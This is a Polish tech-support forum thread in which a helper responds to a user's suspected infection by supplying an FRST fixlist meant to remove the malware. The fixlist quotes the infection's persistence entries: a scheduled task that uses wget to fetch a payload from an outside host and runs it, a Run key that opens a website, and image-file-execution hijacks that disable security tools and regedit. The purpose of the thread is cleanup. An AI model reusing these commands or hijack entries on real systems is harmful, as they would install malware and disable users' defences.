Skocz do zawartości

Podejrzenie infekcji


Rekomendowane odpowiedzi

Dzień dobry szanownemu państwu, włączając dziś komputer zaraz po pojawieniu się ekranu wyskoczyło okno przeglądarki internetowej z taką oto stroną

http://ifotos.pl/zobacz/Beztytulu_spaeprx.jpg

System to Windows 7 64 sp1 postawiony na ssd.

Logi mogłem tylko zrobić z GMER bo frst64 nie chce się włączyć.

Proszę o pomoc w zwalczeniu tej infekcji.

 

Logi.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Dzień dobry szanownemu państwu, włączając dziś komputer zaraz po pojawieniu się ekranu wyskoczyło okno przeglądarki internetowej z taką oto stroną

http://ifotos.pl/zobacz/Beztytulu_spaeprx.jpg

System to Windows 7 64 sp1 postawiony na ssd.

Logi mogłem tylko zrobić z GMER bo frst64 nie chce się włączyć.

Proszę o pomoc w zwalczeniu tej infekcji.

zmień nazwę FRST na jakąś inną

 

jessi

Odnośnik do komentarza

Otwórz Notatnik i wklej w nim:

 

Task: {CDC3B8E6-C4FD-423A-9A92-05B6DA558A79} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grigle.in/index.php?data=MLDIhWCfJS;PowerISO6-x64-Full.exe;1432893265& start cmd /R dat.bmp <==== UWAGA
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [CMD] => cmd.exe /c start http://gangnamgame.org&& exit
IFEO\adwcleaner_5.005.exe: [Debugger] svchost.exe
IFEO\AnVir.exe: [Debugger] svchost.exe
IFEO\AutoLogger.exe: [Debugger] svchost.exe
IFEO\avz.exe: [Debugger] svchost.exe
IFEO\CCleaner.exe: [Debugger] svchost.exe
IFEO\CCleaner64.exe: [Debugger] svchost.exe
IFEO\FRST.exe: [Debugger] svchost.exe
IFEO\FRST64.exe: [Debugger] svchost.exe
IFEO\HiJackThis.exe: [Debugger] svchost.exe
IFEO\mbam.exe: [Debugger] svchost.exe
IFEO\regedit.exe: [Debugger] svchost.exe
IFEO\RegWorks.exe: [Debugger] svchost.exe
IFEO\RSIT.exe: [Debugger] svchost.exe
IFEO\RSITx64.exe: [Debugger] svchost.exe
Reg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} ->  Brak pliku
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe (a właściwie obok "soft.exe"
Uruchom FRST i kliknij przycisk Fix (NAPRAW).
Powstanie plik fixlog.txt.
Daj ten log.

 

jessi

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...